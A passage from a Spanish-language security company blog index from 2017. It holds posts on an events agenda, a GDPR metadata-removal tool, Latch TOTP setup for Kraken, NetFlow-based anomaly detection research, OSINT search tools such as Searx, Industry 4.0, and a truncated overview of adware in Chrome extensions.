http://dx.doi.org/10.1016/j.bjp.2013.10.014. 2012 (Ugo Fiore et al.) Ugo Fiore, Francesco Palmieri, Aniello Castiglione, Alfredo De Santis, Network anomaly detection with the restricted Boltzmann machine, Neurocomputing, Volume 122, 25 December 2013, Pages 13-23, ISSN 0925-2312, http://dx.doi.org/10.1016/j.neucom.2012.11.050. 2013 (Shin-Ying Huang et al.) S. Y. Huang and Y. N. Huang, "Network traffic anomaly detection based on growing hierarchical SOM," 2013 43rd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), Budapest, 2013, pp. 1-2. doi: 10.1109/DSN.2013.6575338 2013 (Duo Liu et al.) D. Liu, C. H. Lung, I. Lambadaris and N. Seddigh, "Network traffic anomaly detection using clustering techniques and performance comparison," 2013 26th IEEE Canadian Conference on Electrical and Computer Engineering (CCECE), Regina, SK, 2013, pp. 1-4. doi: 10.1109/CCECE.2013.6567739 2015 (Shin-Ying Huang et al.) S. Y. Huang, F. Yu, R. H. Tsaih and Y. Huang, "Network-traffic anomaly detection with incremental majority learning," 2015 International Joint Conference on Neural Networks (IJCNN), Killarney, 2015, pp. 1-8. doi: 10.1109/IJCNN.2015.7280573 2014 (Duo Liu et al.) D. Liu, C. H. Lung, N. Seddigh and B. Nandy, "Network Traffic Anomaly Detection Using Adaptive Density-Based Fuzzy Clustering," 2014 IEEE 13th International Conference on Trust, Security and Privacy in Computing and Communications, Beijing, 2014, pp. 823-830. doi: 10.1109/TrustCom.2014.109 Carmen Torrano Innovación y Laboratorio carmen.torrano@11paths.com
9 de octubre de 2017
Tech-Agenda: eventos de tecnología que no te puedes perder este mes
Comienza uno de los trimestres más cargados de eventos de tecnología del año. Desde Telefónica, a través de nuestra unidad de Chief Data Office (CDO) liderada por Chema Alonso, que integra Aura -Inteligencia Cognitiva-, ElevenPaths -Ciberseguridad- y LUCA -Big Data-, presentamos nuestros eventos anuales como Security Innovation Day, Big Data Innovation Day y una selección de los eventos más destacados en los que participamos. ¡Que no se te escape ninguno! EVENTOS DE CIBERSEGURIDAD Security Innovation Day 2017: Security Rocks! Mañana celebramos la V edición de Security Innovation Day, nuestro evento anual sobre innovación en ciberseguridad en el Auditorio de Telefónica. Este año contamos con Mikko Hyppönen, Chief Researcher Officer de F-Secure, como invitado estrella. Sigue el evento en streaming y en nuestras redes sociales a través del hashtag #SID2017, haremos cobertura live del evento en Twitter. Navaja Negra Conference Del 5 al 7 de octubre se celebrará en Albacete la VII edición del Navaja negra conference, un congreso de seguridad informática para 600 participantes que incluye ponencias, talleres, demostraciones y más actividades relacionadas con el mundo de la seguridad y la tecnología. Nuestro Chairman, Chema Alonso, participa en formato entrevista informal y distendida con todos los asistentes al evento. ¡No te pierdas esta cita! Conferencia Iberoamericana de continuidad del negocio El próximo 19 de octubre nuestro CSA Claudio Caracciolo participa en este evento con la charla "Aprender Ukemis para sobrellevar un ataque". ¡Conoce todos los detalles en la página web oficial! 8dot8 Perú El día 20 de octubre se celebra 8dot8, una de las primeras conferencias de seguridad de la información 100% técnica llevada a cabo en Perú. El propósito del evento consiste en conocer las últimas técnicas utilizadas, los últimos tipos de ataques registrados, la forma en que ellos se concretan y cómo se repelen. En esta edición, nuestro CSA Gabriel Bergel participa en la charla de Biohacking durante la primera sesión del evento. Para más información accede aquí. ElevenPaths Talks Además de estos eventos presenciales y como venimos haciendo durante todo el año, los jueves a las 15.30h (CET) te esperamos en nuestra serie de webinars onlines gratuitos sobre las temáticas de más interés y actualidad en el sector de la seguridad. Durante este mes de octubre tendremos dos sesiones impartidas por nuestros expertos CSAs. Estos son los próximos webinars que no te puedes perder: 12 de octubre: Gestión de Monitoreo y Alerta. En esta ocasión nuestros CSAs Pablo San Emeterio y Diego Espitia junto a un invitado especial mostrarán conceptos generales sobre la gestión de sistemas de monitoreo y alerta de incidentes, así como los problemas habituales en su implementación. ¡Atento a nuestro canal de YouTube! 26 de octubre: La Inevitable Evolución de la Seguridad Gestionada. Aprende en este webinar con nuestros expertos Jorge Rivera, Rames Sarwat y un invitado especial sobre Seguridad Gestionada y la evolución al concepto de los Intelligent MSSP. ¡Te esperamos! Code Talks for Devs También, este mes seguimos con los webinars Code Talks for Devs dedicados a desarrolladores y en los que trataremos temáticas sobre lenguajes de programación, código, integraciones técnicas, APIS y ¡mucho más! Concretamente, la sesión de este mes será la siguiente: 18 de octubre: Implementación de Data Exfiltration con Latch’sApp por Álvaro Núñez-Romero y Pablo González. En esta sesión nuestros expertos hablan sobre cómo proteger información en mensajes y ficheros sensibles a través de la codificación en bits con nuestra herramienta Latch’sApp. EVENTOS DE BIG DATA Big Data Innovation Day 2017: Big in Data El día 31 de octubre LUCA, la Unidad de Datos de Telefónica, celebra su Big Data Innovation Day , en el que se presentan en detalle las innovaciones en la propuesta de valor y el portfolio de Big Data de LUCA para los clientes corporativos, incluyendo los servicios de consultoría, las capacidades de infraestructuras y herramientas as a Service , las capacidades analíticas y los business insights . LUCA Talks Asímismo, durante el mes de octubre podrás conocer toda la tecnología big data con los mejores expertos a través de una serie de webinars online. Concretamente, el día 3 de octubre tendrá lugar el LUCA Talk 7 sobre datos móviles en el sector transporte, donde los ponentes Tom Brealey y Oscar García Costa, senior analyst de Telefónica Smart Steps, presentarán las soluciones que ofrece LUCA Transit para la sección industria, entre otros casos de uso más recientes. Ponte al día sobre esta interesante temática cada vez más presente en nuestro día a día y no te pierdas los anteriores LUCA Talks disponibles en la web. ¡Accede ya! EVENTOS DE INTELIGENCIA ARTIFICIAL AIshow Este evento realiza su primera edición durante el 25 y 26 de octubre, enfocándose exclusivamente en presentar las aplicaciones de la Inteligencia Artificial (IA) y en analizar las repercusiones que éstas tienen en las empresas. AIshow contará con la participación de Irene Gómez, Directora de Telefónica Aura, en la mesa redonda: " El futuro de la experiencia de usuario gracias a la AI " con el propósito de explorar las interacciones y los impactos prácticos de la Inteligencia Artificial (IA). No te pierdas esta cita el día 25 de octubre a las 16:30h (CET). Este mes lo tenemos cargado de actividades, recarga las pilas y no te pierdas ninguno de ellos. ¡Disfruta del mes más tecnológico! También te puede interesar: Back to school! Traemos la agenda de eventos de septiembre en ciberseguridad y hacking (aquí) Agenda de eventos en agosto para estar al día en seguridad informática (aquí)
4 de octubre de 2017
Ayuda para cumplimentar la normativa GDPR con Clean-up Online
Ahora que el nuevo reglamento europeo de protección de datos GDPR está en boca de todos, las organizaciones se apresuran a establecer mecanismos que les ayuden a cumplir con esta exigente normativa, y en especial, contra la fuga de información de carácter personal en forma de metadatos que viene claramente recogida. En el mercado podemos encontrar distintas herramientas para analizar metadatos que nos pueden ayudar a conocer si cumplimos o no con el reglamento, pero son pocas las que no están limitadas a unas pocas extensiones de archivos o que no se centren únicamente en imágenes lo cual no cubre nuestra necesidad. Pero, ¿cómo puedo eliminar esta información? Puedes dedicarle tiempo si dispones de las ganas necesarias para hacerlo manualmente (insufrible) o bien teniendo instalado en tu equipo alguna de las herramientas software Metashield especializadas en ello. Esto en muchos casos es lo mejor, y como sucede en muchos de los escenarios (en el correo, en servidores de ficheros o en servidores web) el proceso es automático y nos olvidamos del asunto de los metadatos casi sin enterarnos. Cubrir todos los escenarios en el descubrimiento y tratamiento de metadatos se ha convertido en un objetivo fundamental en nuestra filosofía. Ahora que esta tan cerca la puesta en marcha y aplicación del GDPR es necesario disponer de las herramientas más apropiadas para poder tratar la información sensible, y de paso, sin interferir en los procesos habituales de cualquier organización, o como sucede en muchos escenarios, integrarlos en los distintos entornos o herramientas de gestión documental como parte indivisible. Con este objetivo nace Metashield Clean-up Online, una completa herramienta que ofrece lo mejor de su antecesora Metashield Analyzer, descubriendo y mostrando toda la información oculta de los documentos, unido a la mejor tecnología de tratamiento de metadatos, y todo ello online. Desde cualquier lugar, y desde cualquier dispositivo, algo tan simple como acceder a un portal, subir un archivo y eliminar sus metadatos ya es una realidad. El portal ofrece 2 entornos de operaciones, uno público, para poder seguir descubriendo información sensible con un motor mejorado añadiendo nuevas extensiones soportadas, y una zona privada donde podremos disponer de la herramienta de tratamiento a nuestro gusto ya que es parametrizable, pudiendo añadir, modificar, mantener o eliminar metadatos. Si a esto le unimos la disponibilidad de una API para integrarlo con otras herramientas, cubrimos completamente aquellos escenarios que no encontraban el mecanismo apropiado para convertir la fuga de metadatos en parte de la historia, cumpliendo perfectamente con los reglamentos en cuanto a protección de datos y calidad de la información vigentes. ¿Si nos perjudican, porque no los eliminamos definitivamente? Los metadatos no son el enemigo, de hecho, son parte fundamental en la indexación de ficheros, pero cuando los archivos se comparten, publican o se envían fuera de nuestro alcance, los metadatos viajan con ellos albergando múltiples datos de carácter privado, personal o estructural y esto ha de evitarse para no toparse con el GDPR o un problema aún mayor. Metashield Clean-up Online puede ayudarte a prevenir la fuga de tan valiosa información, así como evitar formar parte del listado de penalizados y sus correspondientes consecuencias reputacionales. ¿Quieres probar la solución? Podrás encontrar más información en el siguiente link. A continuación, te facilitamos un vídeo explicativo: Antonio Bordón Villar Cyber Security Product Manager antonio.bordon@11paths.com
27 de septiembre de 2017
Protege tus Bitcoins, Ethereums & Litecoins en Kraken con Latch Cloud TOTP
En una entrada anterior expusimos cómo se puede configurar Latch Cloud TOTP como segundo factor de autenticación en Coinbase, para proteger tu wallet de BitCoins, Ethereums & LiteCoins. Tal y como se exponía allí, no es el único sitio para gestionar tus criptomonedas que puedes proteger con Latch Cloud TOTP , así que hoy vamos a seguir con Kraken. Kraken fue fundada en 2011, con sede en San Francisco, y es una de las mayores plataformas de intercambio de Bitcoins en Euros, Dólares Canadienses, Dólares Estadounidenses, Libras Esterlinas y Yenes japoneses. Es identificado por algunos medios de comunicación independientes como una plataforma de gran volumen y un nivel alto de seguridad. Figura 1: Kraken Fue el primer intercambiador de Bitcoins en tener el precio y el volumen de transacción exhibido en la Terminal de Bloomberg, el primero en pasar una auditoría de comprobación de reservas criptográficamente verificable, y es socio en el primer banco de criptocorporación. Y en este artículo os queremos mostrar cómo usar Latch Cloud TOTP como segundo factor de autenticación gestionando el uso de moneda digital de una forma más segura y al alcance de todos. Figura 2: Página de activación de cuenta Después de iniciar el registro en la web de Kraken nos solicita una serie de datos como dirección de correo, nombre, etc. El registro y la confirmación de éstos es necesario para poder activar la cuenta que utilizaremos en este sitio. Figura 3: Selección del método en la opción de 2FA Dentro de la opción de menú de Seguridad-->segundo factor de autenticación, podemos configurar la opción de utilizar Latch Cloud TOTP como s egundo factor de autenticación eligiendo este método dentro del menú Method. Se debe seleccionar TOTP mode. Figura 4: Selección de Método Google Authenticator, TOTP Mode Posteriormente vamos a elegir el tipo de algoritmo OTP, y el número de caracteres del OTP, que en este caso puede ser entre 6 a 8. En Latch Cloud TOTP seleccionamos 6 caracteres y el algoritmo de TOTP. Figura 5: QRCode generado para parear con Latch Una vez hecho esto, nos aparecerá una pantalla con el Código QR de pareado y nos solicitará un Token OTP de confirmación de que el algoritmo ha sido configurado correctamente en tu app de Latch. Figura 6: Añadir Servicio -> Proteger con Cloud TOTP -> Escanear código QR En las siguientes pantallas mostramos el flujo de pantallas en la app de Latch. En estas primeras, seleccionamos añadir un nuevo servicio, protegemos con Cloud TOTP y escaneamos el Código QR, mostrado en la figura 6 de la web de Kraken. Figura 7: Renombrar y listo Después de escanear el Código QR, podemos cambiar la denominación del servicio y si continuamos ya disponemos de la protección de Latch Cloud TOTP implementada en mi wallet Latch. Hay que confirmar en Kraken con un Token generado por Latch que el proceso ha ido bien. Y cuando se hace, nos informa el sitio web de Kraken. Figura 8: Configuración de Latch TOTP correcta Y ya tenemos nuestro servicio de Kraken fácilmente protegido por Latch. Además, podemos organizar en una carpeta en Latch todos los Cloud TOTP que dispongamos. Figura 9: Correo de confirmación co la configuración del TOTP Además, el sitio web de Kraken nos informará por e-mail de que se ha configurado correctamente la protección TOTP en nuestra cuenta del servicio. Finalmente, para que podáis ver el proceso completo, os hemos preparado el siguiente vídeo: ¡Feliz Martes! Juan Carlos Vigo López Product manager de Latch @juancarlosvigol juancarlos.vigolopez@11paths.com
26 de septiembre de 2017
Netflow, machine learning y la detección de anomalías en red: una aproximación académica (Parte II)
Encontrar patrones en los datos de red que no se ajusten al comportamiento esperado (o sea anomalías), sigue siendo un reto interesante en la seguridad informática. Las anomalías en el tráfico aparecerán por varias razones como actividades maliciosas o caídas, y en este sentido Netflow, en combinación con técnicas de machine learning, puede convertirse en un buen aliado para ir más allá de las firmas y ser capaz así de encontrar patrones previamente desconocidos. Hablábamos en la anterior entrega de la descripción de NetFlow, virtudes, defectos y limitaciones. Para darles solución han surgido varias propuestas que vamos a describir a continuación. sFlow Sampled Flow (sFlow) es un estándar para la exportación de paquetes de la capa 2. Dado que es abierto, puede resultar en una alternativa para fabricantes que no soporten NetFlow. Se encuentra definido en el RFC 3176 y su versión actual es la 5. sFlow presenta algunas similitudes con Netflow porque que se sitúa en switches y routers y exporta información sobre los flujos. Sin embargo el protocolo presenta también algunas diferencias. Una es que sFlow no tiene noción de flujos o de agregación de paquetes. Este protocolo nació para reducir el coste computacional de NetFlow y ayudar en el análisis en tiempo real. Hay que tener en cuenta que en algunos entornos muy especiales como "internet backbones" era demasiado costoso debido al nivel de procesado requerido por cada paquete y la gran cantidad de flujos simultáneos. Fuente: sflow.org sFlow utiliza el muestreo para solucionar problemas de escalabilidad de NetFlow y aplicarse a redes de alta velocidad. Aplica dos tipos de muestreo: El aleatorio de paquetes u operaciones en la capa de aplicación; y el muestreo basado en tiempo de los contadores. Flexible NetFlow Esta implementación permite al usuario definir muchos aspectos de los flujos, y exportar casi todo lo que pase por el router, incluyendo paquetes enteros y trabajando en tiempo real como sFlow. Permite definir cómo se quieren optimizar los recursos de la red, reducir el coste de operaciones, planear la capacidad de la red, identificar la aplicación óptima para la calidad del servicio, definir aspectos para la detección de incidentes de seguridad y por tanto, lógicamente, anomalías en la red. Puede jugar un papel importante en la detección de ataques como denegaciones de servicio o malware. Además, aporta flexibilidad y escalabilidad sobre el flujo de datos a NetFlow. También permite personalizar la identificación de tráfico y monitorizar comportamientos específicos en la red, así como monitorizar un rango más amplio de información de los paquetes y producir información sobre el comportamiento de la red. IPFIX (IP Flow Information Export) IPFIX es un protocolo definido por el IETF y es el estándar que define cómo la información de los flujos IP se debe formatear y transferir de un exportador a un colector. Sobre IPFIX se pueden consultar los RFC 3917, 7011, 7015, 5103. La idea con IPFIX fue crear un estándar universal y común para exportar información de los flujos IP de los routers, sondas y otros dispositivos usados para la facturación o la gestión de la red. Algunas de las diferencias con Netflow son que proporciona más características y admite campos de longitud variable. Diferentes enfoques Históricamente, para el análisis de flujos de Netflow se han utilizado varias técnicas, tales como técnicas estadísticas, basados en conocimiento y las técnicas de machine learning. El enfoque de estadísticas es un método bastante utilizado en el análisis de Netflow. Tiene la ventaja de ser fácil de implementar, conseguir buenos resultados y consumir pocos recursos. Sin embargo, el punto negativo está en que las detecciones sólo son buenas para casos conocidos y no son flexibles en la adaptación para la detección de nuevos casos. Hay varios trabajos que utilizan este enfoque, como [1] y [2], que proponen IDS basados en modelos estadísticos. Sawaya et al. [3] propusieron un enfoque para detección de ataques basado en estadísticas sobre los hosts. Incluso se ha utilizado para la detección de botnets [4]. Sistemas basados en conocimiento. En esta categoría se engloban sistemas en los que se establecen modelos o reglas de acuerdo a los que se clasifica la información. Por ejemplo, puede tratarse de modelos construidos manualmente o sistemas expertos en los que se definan una serie de reglas para la clasificación. También podrían usarse artilugios como las máquinas de estados finitas para definir estos modelos. [5]. Las técnicas de machine learning permiten obtener conocimiento por medio de la extracción de patrones. Esto lo hace un método idóneo para la detección de casos que no se conocían previamente. En la última parte de esta serie de artículos nos centraremos en el último enfoque, que engloba una serie de técnicas para extraer conocimiento mediante la búsqueda de patrones. Los algoritmos de machine learning son capaces de generalizar comportamientos a partir de información suministrada en forma de ejemplos, son técnicas útiles y utilizadas para la detección de anomalías. Más información: [1] Proto A, Alexandre LA, Batista ML, Oliveira IL, Cansian AM. Statistical model applied to netflow for network intrusion detection. Transactions on Computational Science 2010;11:179-91. [2] Bin L, Chuang L, Jian Q, Jianping H, Ungsunan P. A NetFlow based flow analysis and monitoring system in enterprise networks. Computer Networks 2008;52(5): 1074-92. [3] Sawaya Y, Kubota A, Miyake Y. Detection of attackers in services using anomalous host behavior based on traffic flow statistics. In: 2011 IEEE/IPSJ 11th international symposium on applications and the internet (SAINT), July 2011. p. 353-9. [4] Barsamian AV. Network characterization for botnet detection using statisticalbehavioral methods. Master's thesis, Thayer School of Engineering, Dartmouth College, USA; June 2009. [5] Estévez-Tapiador et al. [4] utilizaron esta técnica para modelar protocolos de red. Estévez-Tapiador JM, García-Teodoro P, Díaz-Verdejo JE. Stochastic protocol modeling for anomaly based network intrusion detection. In: Proceedings of IWIA 2003. IEEE Press, ISBN 0-7695-1886-9; 2003. p. 3–12. Carmen Torrano Equipo de Innovación y Laboratorio carmen.torrano@11paths.com
25 de septiembre de 2017
Estrategias de búsqueda para el analista (con buscadores personalizados)
Una gran parte de las tareas de obtención de información en el marco de una investigación empiezan por los diferentes buscadores. Desde Google o Bing para búsquedas generalistas incluyendo la búsqueda en imágenes hasta Yandex o Baidu si preferimos localizar las búsquedas en entornos concretos como Rusia o China. En el caso específico de que estemos trabajando con activos tecnológicos podemos utilizar Shodan o Zoomeye y si queremos realizar búsquedas en dominios .onion de la red Tor siempre podemos optar por Ahmia o Grams. Los buscadores personalizados de Google: una forma de rápida de encontrar lo que buscas Habitualmente, cuando estamos realizando algún tipo de investigación nos encontramos con actores e indicadores sobre los que queremos encontrar más información y para ello el punto de partido suele ser Google. El problema es que una vez que el caso ya ha salido a la luz, el ruido que se genera con la información expuesta en medios de comunicación es demasiado elevado y nos cuesta demasiado separar el grano de la paja. ¿Cómo minimizamos este problema? La aproximación más inmediata pasa por apoyarnos en los dorks de Google como site:elevenpaths.com para encontrar resultados que pertenezcan únicamente a un dominio concreto. Si estuviéramos hablando de una búsqueda oficial sobre vulnerabilidades documentadas o informes realizados por empresas especializadas, también podríamos realizar la búsqueda con una cadena de site: que incluyan a los fabricantes más reconocidos. El problema es que esto no es operativo si cada vez que queremos consultar sobre un tema específico tenemos que tener en mente la lista de dominios temáticos en los que queremos buscar. Para facilitarnos el trabajo, Google nos ofrece la posibilidad de crear buscadores personalizados con su servicio Custom Search Engine. En ellos, desde nuestra propia cuenta de Google Apps podremos crear un buscador adecuado a nuestras necesidades. Custom Search Engine de Google Por ejemplo, si queremos buscar información sobre "MacronLeaks", la fuga de información de Dropbox o sobre el grupo APT28 y que la información que nos aparezca sea directamente de medios previamente identificados, podríamos configurar una búsqueda personalizada que nos limitará los resultados a páginas como elevenpaths.com, securelist.com, krebsonsecurity.com, securityaffairs.co, etc. Uso de un buscador personalizado de Google sobre el término "MacronLeaks" centrado en una lista de dominios preconfigurada Basta con repasar nuestras necesidades anteriores e ir adecuando las búsquedas a través de una interfaz muy sencilla de configurar y que está accesible una vez presentado con tu cuenta de Google en cse.google.com. Una vez ahí, podemos guardar la URL pública que se nos ha generado ( como esta) para compartirlo con compañeros del equipo. De esta manera, vamos a evitar resultados que Google pueda considerar más relevantes por el hecho de aparecer en prensa generalista y que tienen un mejor posicionamiento, pero que para el analista técnico contienen información genérica menos importante. Las otras alternativas libres Una función interesante puede consistir en apoyarnos en Searx, un proyecto hospedado en Github con licencia AGPL y que funciona como un metabuscador en docenas de plataformas. Aunque existen varias instancias públicas, el proyecto se puede instalar en local usando Docker y apenas un par de comandos: docker pull wonderfall/searx docker run -d --name searx -p $PORT:8888 wonderfall/searx Vista principal de la página de bienvenida de una de las instancias públicas del metabuscador Searx Para probar sus capacidades, podemos usar una de las instancias públicas como Searx.me. La potencia de los resultados recae en que combina los resultados de Google, Bing, Duckduckgo,WolframAlpha, Flickr, Youtube entre otros muchos. Los resultados vienen categorizados en función de su naturaleza además de ofrecernos algunas sugerencias en base a términos conocidos o relacionados. Otro de los aspectos interesantes es que ha sido concebido para ser programado. En la propia documentación de la API del proyecto nos permitirá interactuar con nuestra instancia especificando el formato a utilizar y la página de resultados que queremos recuperar a cada momento modificando la ventana con el parámetro pageno. De esta manera, la programación de soluciones que se apoyen en los principales buscadores se puede encargar de gestionar directamente los resultados devueltos y no de interactuar con cada una de las aplicaciones de forma separada. Por ejemplo, si quisiéramos los resultados anteriores en formato Json bastaría con que especificáramos en la URL que se nos genera la opción format=json, de modo que nos quedaría una petición como esta. https://searx.me/?q=elevenpaths&categories=general&format=json El resultado es menos humano pero mucho más machine-friendly. Más allá de Searx, existen otros proyectos también interesantes como Yacy que nos permiten beneficiarnos de otras funcionalidades como el crawling distribuido. El proyecto es de software libre y se puede instalar con relativa facilidad. Permite la creación de entornos de búsqueda a medida que cada uno puede personalizar a su gusto: desde colaborar por defecto con una red descentralizada en la identificación de nuevos contenidos hasta utilizarlo de forma privada para escanear el contenido de una intranet por ejemplo y permitir a los usuarios tener acceso a los contenidos a través de un buscador a medida. Más herramientas al servicio del analista Al margen de dominar las técnicas de obtención de información convencionales, conviene estar pendientes de otras herramientas que nos puedan facilitar el trabajo para contener (en la medida de lo posible) el esfuerzo dedicado a muchas de las tareas de obtención y poder aprovechar mejor el tiempo disponible. Al fin y al cabo, conocerlas es la mejor manera de acortar estos tiempos para podernos centrar precisamente en esas otras tareas más complejas de automatizar. Innovación y laboratorio Yaiza Rubio yaiza.rubio@11paths.com @yrubiosec Félix Brezo felix.brezo@11paths.com @febrezo
18 de septiembre de 2017
Telefónica impulsa la transformación digital hacia una industria conectada 4.0
*Post publicado originalmente aquí con motivo del I Congreso de Industria Conectada 4.0 que tendrá lugar en Madrid el 21 de septiembre. El Congreso está siendo organizado por el Ministerio de Economía, Industria y Competitividad de España, en el marco de su estrategia Industria Conectada 4.0. Hablamos de la industria 4.0 como la cuarta revolución industrial. La digitalización está transformando todo a un ritmo vertiginoso. Y para ello todos los agentes implicados, empresas, ciudadanos y administraciones públicas, debemos adaptarnos a esta realidad para ser competitivos en este nuevo entorno. No cabe duda de que la digitalización plantea incertidumbres que tendremos que abordar, pero también proporcionará nuevas oportunidades de crecimiento económico y bienestar social que nos permitirá avanzar hacia una sociedad mejor. Tenemos la gran oportunidad de transformar la sociedad, las instituciones y la industria en particular. Esta realidad, unida a nuestras capacidades, nos motiva a impulsar esta transformación de la mano del tejido industrial del país, de compañías tecnológicas y de la Administración. En Telefónica estamos viviendo un proceso similar. Un proceso en el que, en poco tiempo, hemos tenido que transformar “nuestra fábrica”, el diseño, la distribución y la comercialización de nuestros servicios para atender mejor las necesidades de nuestros clientes. Gracias a ello, hemos adquirido capacidades tecnológicas y de innovación que nos permiten competir en este nuevo ecosistema empresarial. Entre otros, tenemos experiencia contrastada en proyectos de Big Data, Inteligencia Artificial, IoT (Internet de las Cosas), Cloud y Seguridad; estamos trabajando con empresas y colaborando en su transformación gracias a la adopción de estas tecnologías; contribuimos a desarrollar, junto a las Administraciones Públicas, plataformas de colaboración e interoperabilidad; e impulsamos la innovación en un ecosistema abierto, a través de iniciativas como Open Future o Wayra. Y, como siempre, estamos a la cabeza en el despliegue de redes de nueva generación para atender a las altas exigencias de conectividad del sector industrial. Y, en Telefónica, queremos contribuir a este proceso desde la perspectiva y el conocimiento que supone ser el operador líder de servicios de conectividad y soluciones digitales de este país. Un país que lidera el despliegue de fibra en Europa y nos sitúa en una posición privilegiada para el futuro despliegue de 5G. Apostamos decididamente por la industria conectada 4.0. Tenemos que aprovechar todas las oportunidades que brindan la digitalización y las nuevas tecnologías. Seguiremos trabajando junto con el Ministerio de Industria en esta iniciativa, una iniciativa clave para el futuro de la industria española. Jose María Álvarez-Pallete Presidente, Telefónica S.A. @jmalvpal Artículo también publicado en Telefónica Public Policy.
15 de septiembre de 2017
Netflow, machine learning y la detección de anomalías en red: una aproximación académica (Parte I)
Encontrar patrones en los datos de red que no se ajusten al comportamiento esperado (o sea anomalías), sigue siendo un reto interesante en la seguridad informática. Las anomalías en el tráfico aparecerán por varias razones como actividades maliciosas o caídas, y en este sentido Netflow, en combinación con técnicas de machine learning, puede convertirse en un buen aliado para ir más allá de las firmas y ser capaz así de encontrar patrones previamente desconocidos. Analicemos ciertos estudios académicos que se han realizado hasta ahora en torno a la detección de anomalías con Netflow. Netflow Netflow es un protocolo de red desarrollado por Cisco en 1996. La versión 9 viene recogida en el RFC 3954. Netflow recoge información sobre tráfico IP cuando entra o sale de una interfaz. Define cómo un router exporta información y estadísticas de sockets. Es un estándar que incorporan muchos de los routers y switches de Cisco, Juniper, Enterasys y otros fabricantes. El IETF define un flujo como una secuencia de paquetes desde una aplicación remitente a una receptora. Una definición análoga lo describe un flujo de red como una secuencia uni o bidireccional de paquetes entre dos endpoints (del cliente al servidor o viceversa). Algunos de los campos más destacados incluyen la fecha y hora de comienzo y finalización del flujo, dirección IP de origen y destino, puerto origen y destino, tipo de protocolo, interfaz lógica de entrada y salida, tipo de servicio, información de ruteo (next hop y máscara IP) y bytes transferidos, entre otros. En función de la versión de Netflow pueden darse algunas variaciones en los campos contemplados. Estas estadísticas del tráfico se pueden usar para diferentes propósitos, desde la seguridad a la monitorización de la red pasando por el análisis del tráfico, clasificación o facturación. Dentro del ámbito específico de la seguridad, obviamente, Netflow se puede utilizar para la detección de escaneos denegaciones de servicio, detección de malware, atacantes internos, violaciones en la política de seguridad, malas configuraciones o ayudar en investigaciones forenses. Como ya comentamos en un artículo anterior, un sistema de este tipo consta de tres componentes principales: exportador, colector y analizador. En algunos sistemas se incorpora una caché en caso de gran cantidad de tráfico de red o de limitación en los recursos computacionales. Los dispositivos de red miran los paquetes que llegan a las interfaces y capturan las estadísticas por flujo basándose en la configuración asignada. Almacenan los flujos en una caché, agregan y exportan los datos a través de UDP o SCTP. La caché se crea con la llegada del primer paquete del flujo, se mantiene para flujos con características similares y se exporta periódicamente a los colectores de acuerdo a la política establecida. Esto puede tener algunos inconvenientes como que algunos flujos no se contemplen cuando la caché esté llena. Los formatos de exportación de las versiones 1 a 8 de Netflow son fijos. Sin embargo, a partir de la versión 9 es más flexible e incorpora MPLS, IPv6, BGP e incluso campos que puede definir el usuario. Las versiones más populares de Netflow son la 5 y 9. Ventajas y desventajas de Netflow Netflow es ligero y universal. Está adoptado como un estándar en muchos dispositivos de los fabricantes más importantes. Las ventajas de trabajar con un estándar y de forma unificada son evidentes, y dada la heterogeneidad que suele estar presente en la redes, el hecho de contar con una fuente de datos unificada puede ser de gran ayuda. La gran cantidad de tráfico que circula por las redes puede llegar a ser abrumadora y ahí es donde la capacidad de Netflow de agregar tráfico puede resultar también muy útil al permitir abstraerse de los detalles y mostrar estadísticas sobre el tráfico de red que permita conocer qué está pasando. De esta manera, agregando el tráfico, es posible que un colector de Netflow reciba flujos que podrían representar a miles de paquetes. Además Netflow no resulta especialmente complicado o costoso en su adopción y despliegue. En lo relacionado con la seguridad, puede ser útil para levantar alertas en un primer nivel que posteriormente se puedan refinar con algoritmos que van más al detalle. La potencial presencia de DPI (Deep Packet Inspection) puede detectar muchos más ataques que pasan desapercibidos a Netflow, sin embargo se podría utilizar este primer nivel de filtrado para ahorrar tiempo y recursos además de ayudar a agilizar el análisis del tráfico en tiempo real. Otra de las ventajas que puede presentar Netflow es el cumplimiento de ciertas normativas en el sentido de que no revela información privada, sensible o personal. Cuando se trata con tráfico de aplicación que puede contener este tipo de la información es habitual enfrentarse a situaciones en los que se exija privacidad, siendo necesario en muchos casos adoptar soluciones como pueden ser la anonimización de los datos. Pero precisamente la característica de abstracción de detalles de Netflow se puede convertir también en una desventaja en determinadas situaciones. Debe tenerse en cuenta que Netflow se queda en un análisis en la capa de red y por tanto, algo tan relevante como la información de la capa de aplicación, por ejemplo, no está disponible a priori. Sin datos de protocolos específicos, en el caso de la detección de anomalías, es posible que únicamente analizando el tráfico Netflow se den casos en los que la anomalía sea compleja de detectar. Por ejemplo, si se quiere proteger un servidor web, el tráfico Netflow no permitiría detectar muchos ataques web que únicamente pueden detectarse cuando se analizan los parámetros presentes en la petición de la capa de aplicación. Es por ello que en algunas situaciones se incorpora información de la capa de aplicación a las trazas Netflow. No es la única limitación. De hecho, para darles solución han surgido varias propuestas que repasaremos en la siguiente entrega. Carmen Torrano Innovación y laboratorio carmen.torrano@11paths.com
12 de septiembre de 2017
¿Por qué las extensiones de Chrome (y sus permisos) son el objetivo de los atacantes?
El 5 de agosto recibimos un correo como el de la imagen más abajo. La propia Chrome Web Store reconocía que sus desarrolladores habían sido objeto de ataques de phishing. Como en ElevenPaths hemos publicado Pin Patrol, nos alertaban. Poco antes, sabíamos que dos populares extensiones CopyFish y Web Developer, con más de un millón de usuarios entre ambas habían sido alteradas con adware… probablemente porque robaron la contraseña de esta forma a los creadores. Pero veamos brevemente en esta entrada qué pasa con las extensiones, cómo funcionan y qué peligros entrañan. CopyFish y Web Developer, dos populares extensiones, habían sido alteradas a finales de julio. Los nuevos usuarios o los que actualizasen, se encontraban con pop-ups superpuestos en sus páginas, redirecciones a webs de anucnios, etc. En resumen, el adware incrustado hasta las entrañas del navegador. Y es que las extensiones de Chrome son ideales para este fin. Tanto, que existe todo un negocio al respecto. Por las buenas o por las malas… existen tres vías principalmente. 1) El propio desarrollador crea el adware De forma un poco sutil, para poder llegar a la tienda sin sospechas, los atacantes buscan publicar directamente extensiones que son adware. La temática puede variar. Por ejemplo, hace un par de años en ElevenPaths analizamos una campaña de extensiones que pretendían simular el popular AdBlock, pero que no eran más que redirectores a otros programas y páginas web de dudoso prestigio. Extensiones de Adblock falsas en la Store Desde aquí hacen spam, intentan inyectar adware, etc. Todo vale mientras Google apruebe la extensión. Crear un usuario desarrollador en WebStore solo son 5 dólares, así que merece la pena.También cabe la posibilidad de distribuirlas fuera incluso del Web Store oficial. Y esto sirve incluso para las apps que no son adware propiamente... pueden servir como método de propaganda. El propio desarrollador de 